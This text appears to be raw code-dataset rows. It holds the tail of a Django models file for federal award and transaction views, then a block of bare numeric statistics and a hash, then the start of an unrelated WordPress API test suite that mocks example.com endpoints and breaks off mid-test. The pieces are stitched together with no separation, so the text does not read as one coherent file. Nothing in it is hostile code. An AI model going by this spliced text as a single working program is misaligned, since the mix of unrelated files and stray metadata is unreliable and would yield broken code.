recipient_location_foreign_city_name = models.TextField() recipient_location_foreign_postal_code = models.TextField() recipient_location_foreign_province = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_name = models.TextField() recipient_unique_id = models.TextField() record_type = models.IntegerField() referenced_idv_agency_desc = models.TextField() referenced_idv_agency_iden = models.TextField() sai_number = models.TextField() sea_transportation = models.TextField() sea_transportation_desc = models.TextField() labor_standards = models.TextField() labor_standards_descrip = models.TextField() small_business_competitive = models.TextField() solicitation_identifier = models.TextField() solicitation_procedur_desc = models.TextField() solicitation_procedures = models.TextField() subaward_count = models.IntegerField() subcontracting_plan = models.TextField() subcontracting_plan_desc = models.TextField() total_obligation = models.DecimalField(max_digits=15, decimal_places=2) total_outlay = models.DecimalField(max_digits=15, decimal_places=2) total_subaward_amount = models.DecimalField(max_digits=15, decimal_places=2) total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) type = models.TextField() type_description = models.TextField() type_of_contract_pric_desc = models.TextField() type_of_contract_pricing = models.TextField() type_of_idc = models.TextField() type_of_idc_description = models.TextField() type_set_aside = models.TextField() type_set_aside_description = models.TextField() uri = models.TextField() materials_supplies_article = models.TextField() materials_supplies_descrip = models.TextField() class Meta: managed = False db_table = 'award_matview' class AwardCategory(models.Model): type_code = 
models.TextField() type_name = models.TextField() class Meta: managed = False db_table = 'award_category' class TransactionMatview(models.Model): generated_unique_transaction_id = models.TextField(primary_key=True, db_column='generated_unique_transaction_id') award = models.ForeignKey(to='awards.AwardMatview', to_field='generated_unique_award_id', db_column='generated_unique_award_id', related_query_name='award') action_date = models.DateTimeField() agency_id = models.TextField() assistance_type = models.TextField() award_description = models.TextField() award_modification_amendme = models.TextField() awardee_or_recipient_legal = models.TextField() awardee_or_recipient_uniqu = models.TextField() awarding_agency_code = models.TextField() awarding_agency_name = models.TextField() awarding_sub_tier_agency_c = models.TextField() awarding_sub_tier_agency_n = models.TextField() awarding_office_code = models.TextField() awarding_office_name = models.TextField() base_and_all_options_value = models.DecimalField(max_digits=15, decimal_places=2) business_funds_indicator = models.TextField() business_types = models.TextField() business_types_description = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() contract_award_type = models.TextField() contract_award_type_desc = models.TextField() extent_compete_description = models.TextField() extent_competed = models.TextField() fain = models.TextField() federal_action_obligation = models.DecimalField(max_digits=15, decimal_places=2) funding_agency_code = models.TextField() funding_agency_name = models.TextField() funding_sub_tier_agency_co = models.TextField() funding_sub_tier_agency_na = models.TextField() funding_office_code = models.TextField() funding_office_name = models.TextField() idv_type = models.TextField() idv_type_description = models.TextField() last_modified_date = models.TextField() naics = models.TextField() naics_description = models.TextField() original_loan_subsidy_cost = 
models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) parent_award_piid = models.TextField() period_of_performance_curr = models.DateTimeField() period_of_performance_star = models.DateTimeField() piid = models.TextField() pop_city_name = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_congressional_code = models.TextField() pop_zip5 = models.TextField() product_or_service_co_desc = models.TextField() product_or_service_code = models.TextField() pulled_from = models.TextField() recipient_location_address_line1 = models.TextField() recipient_location_address_line2 = models.TextField() recipient_location_address_line3 = models.TextField() recipient_location_city_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_foreign_province = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_zip5 = models.TextField() record_type = models.IntegerField() referenced_idv_agency_iden = models.TextField() referenced_idv_type = models.TextField() referenced_idv_type_desc = models.TextField() sai_number = models.TextField() transaction_number = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() type_set_aside_description = models.TextField() uri = models.TextField() class Meta: managed = False db_table = 'transaction_matview' class SubawardView(models.Model): subaward = 
models.OneToOneField(Subaward, primary_key=True, on_delete=models.deletion.DO_NOTHING) keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() latest_transaction_id = models.IntegerField() last_modified_date = models.DateField() subaward_number = models.TextField() amount = models.DecimalField(max_digits=20, decimal_places=2) total_obl_bin = models.TextField() description = models.TextField(null=True, blank=True) fiscal_year = models.IntegerField() action_date = models.DateField() award_report_fy_month = models.IntegerField() award_report_fy_year = models.IntegerField() # award = models.OneToOneField(Award, primary_key=True) award = models.OneToOneField(Award, primary_key=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_unique_id = models.TextField() recipient_name = models.TextField() dba_name = models.TextField() parent_recipient_unique_id = models.TextField() parent_recipient_name = models.TextField() business_type_code = models.TextField() business_type_description = models.TextField() award_type = models.TextField() prime_award_type = models.TextField() cfda_id = models.IntegerField() piid = models.TextField() fain = models.TextField() business_categories = ArrayField(models.TextField(), default=list) prime_recipient_name = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() product_or_service_code = 
models.TextField() product_or_service_description = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_city_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_street_address = models.TextField() recipient_location_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_city_code = models.TextField() pop_city_name = models.TextField() pop_zip5 = models.TextField() pop_street_address = models.TextField() pop_congressional_code = models.TextField() class Meta: managed = False db_table = 'subaward_view' class SummaryTransactionRecipientView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class 
Meta: managed = False db_table = 'summary_transaction_recipient_view' class SummaryAwardRecipientView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") date_signed = models.DateField(blank=False) action_date = models.DateField(blank=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) recipient_hash = models.UUIDField(null=True) parent_recipient_unique_id = models.TextField(blank=True, null=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_award_recipient_view'
45.625571
117
0.760283
4,602
39,968
6.251847
0.067145
0.267978
0.066699
0.083417
0.863682
0.822043
0.789962
0.77029
0.739946
0.709708
0
0.006512
0.150871
39,968
875
118
45.677714
0.84124
0.001326
0
0.738065
0
0
0.022198
0.011425
0
0
0
0
0
1
0
false
0
0.007742
0
0.938065
0
0
0
0
null
1
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
9
98f096566c27b8ecba3ea4d3107dc85b534aa66f
75,248
py
Python
wordpress_api/tests.py
kallewesterling/django-wordpress-api
856ab95ce83345e21f801d59967d3afb6bdf9250
[ "MIT" ]
18
2016-09-02T16:04:25.000Z
2020-10-23T01:27:49.000Z
wordpress_api/tests.py
ImaginaryLandscape/django-wordpress-api
1dd205d095b6f637779cc437ffa8b6004e40075a
[ "MIT" ]
11
2017-01-11T20:37:29.000Z
2022-03-23T20:19:04.000Z
wordpress_api/tests.py
ImaginaryLandscape/django-wordpress-api
1dd205d095b6f637779cc437ffa8b6004e40075a
[ "MIT" ]
9
2016-10-27T14:17:48.000Z
2021-04-23T15:31:56.000Z
# !/usr/bin/env python # -*- coding: utf-8 -*- import responses from django.urls import reverse from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.test import TestCase, override_settings, Client from wordpress_api.utils import WPApiConnector """ test_django-wordpress-api ------------ Tests for `django-wordpress-api` models module. """ class TestUtils(TestCase): """ Tests for wordpress_api.utils """ @responses.activate def setUp(self): responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 
'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') self.connector = WPApiConnector() self.default_response_kwargs = { 'json': {'success': 'something found'}, 'status': 200, 'content_type': 'application/json', } def test_connector_load_meta_data(self): """ if load_meta_data is False, the wordpress metadata should be empty """ connector = WPApiConnector(load_meta_data=False) self.assertFalse(connector.authors) self.assertFalse(connector.categories) self.assertFalse(connector.tags) def test_connector_gets_all_authors(self): """ connector object should have the authors as one of its properties """ self.assertTrue(self.connector.authors is not None) self.assertTrue('test-slug' in self.connector.authors) self.assertEqual(self.connector.authors['test-slug']['id'], 2) @override_settings(WP_URL='') def test_raises_error_if_no_api_url(self): """ If the wp_api url is not defined, utils should return a message with configuration error. """ with self.assertRaises(ImproperlyConfigured): WPApiConnector() @responses.activate def test_connection_returns_error(self): """ If server cannot be reached a message with server error should be returned """ connector = self.connector posts = connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. 
""" responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') posts = self.connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_authors(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=404, content_type='application/json') authors = self.connector.get_authors() self.assertTrue('server_error' in authors.keys()) @responses.activate def test_authors_gets_several_pages(self): """ When the endpoint returns several pages, the get_authors method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ "id": 2, "name": "test-slug-2", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug-2", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') authors = self.connector.get_authors() self.assertEqual(2, len(authors.keys())) @responses.activate def test_connection_error_propagates(self): """ 
When we get a connection error from the server, an error indicating that something happened along with the status code is required. """ posts = self.connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_get_tags(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=404, content_type='application/json') posts = self.connector.get_tags() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_tags_gets_several_pages(self): """ When the endpoint returns several pages, the get_tags method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test 2', 'slug': 'test-2', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 
'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') tags = self.connector.get_tags() self.assertEqual(2, len(tags)) @responses.activate def test_connection_error_propagates_get_tags(self): """ When we get a connection error from the server, an error indicating that something happened along with the status code is required. """ posts = self.connector.get_tags() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_get_categories(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=404, content_type='application/json') posts = self.connector.get_categories() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_connection_error_propagates_get_categories(self): """ When we get a connection error from the server, an error indicating that something happened along with the status code is required. 
""" posts = self.connector.get_categories() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_categories_gets_several_pages(self): """ When the endpoint returns several pages, the get_categories method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test 2', 'slug': 'test-2', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') categories = self.connector.get_categories() self.assertEqual(2, len(categories)) @responses.activate def test_connector_uses_orderby(self): """ By default orderby is defined to be date. 
It can be something else (like title) and the query should be changed accordingly. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue( 'orderby=date' in posts['headers']['request_url']) posts = self.connector.get_posts(orderby='title') self.assertTrue( 'orderby=title' in posts['headers']['request_url']) @responses.activate def test_page_number_is_used(self): """ Page number is 1 by default. If it is an int it gets used. If it is None it gets ignored. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue('page=1' in posts['headers']['request_url']) posts = self.connector.get_posts(page_number=10) self.assertTrue('page=10' in posts['headers']['request_url']) posts = self.connector.get_posts(page_number=None) self.assertTrue('page=' not in posts['headers']['request_url']) @responses.activate def test_extra_filters(self): """ If filter_type and filter_content are passed as arguments, they are taken in account for the query to the server. Otherwise ignored. 
""" responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts( wp_filter={'some_filter': 'some_content'}) self.assertTrue( 'some_filter=some_content' in posts[ 'headers']['request_url']) @responses.activate def test_custom_types(self): """ If custom type is defined, it should be used, otherwise ignored """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue('type=' not in posts['headers']['request_url']) posts = self.connector.get_posts(custom_type='glossary') self.assertTrue('type=glossary' in posts['headers']['request_url']) class TestViews(TestCase): """ Tests for wordpress_api.views """ def setUp(self): self.default_response_kwargs = { 'json': [{ "tags": [ 1 ], "categories": [ 1 ], "_embedded": { "author": [ { "id": 12, "name": "test-slug", "url": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, } ], "wp:featuredmedia": [ { "id": 4543, } ], }, 'excerpt': 'test blog', 'slug': 'test-blog', 'date': '2007-01-25T12:00:00Z', 'author': {'name': 'test', 'slug': 'test-slug'}, 'terms': { 'post_tag': [{'slug': 'test-tag', 'name': 'test tag'}], 'category': [{'slug': 'test-category', 'name': 'test category'}] }, 'date_gmt': '2007-01-25T12:00:00Z', }], 'status': 200, 'content_type': 'application/json', 'adding_headers': {'X-WP-Total': '1', 'X-WP-TotalPages': '1'}, } self.client = Client() # BlogListView @responses.activate def test_blog_list_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": 
"https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 200) @responses.activate def test_blog_list_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = 
self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_list_view_return_404_if_connection_error(self): """ If the server returns something different that 200, it should return 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 
'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_list_view_return_404_if_no_blogs(self): """ If the server returns an empty list, it should return 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=200, json=[], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 
'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) # BlogView @responses.activate def test_blog_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 
'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 200) @responses.activate def test_blog_view_return_404_if_server_status(self): """ If the server returns something different from 200, it raises 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 
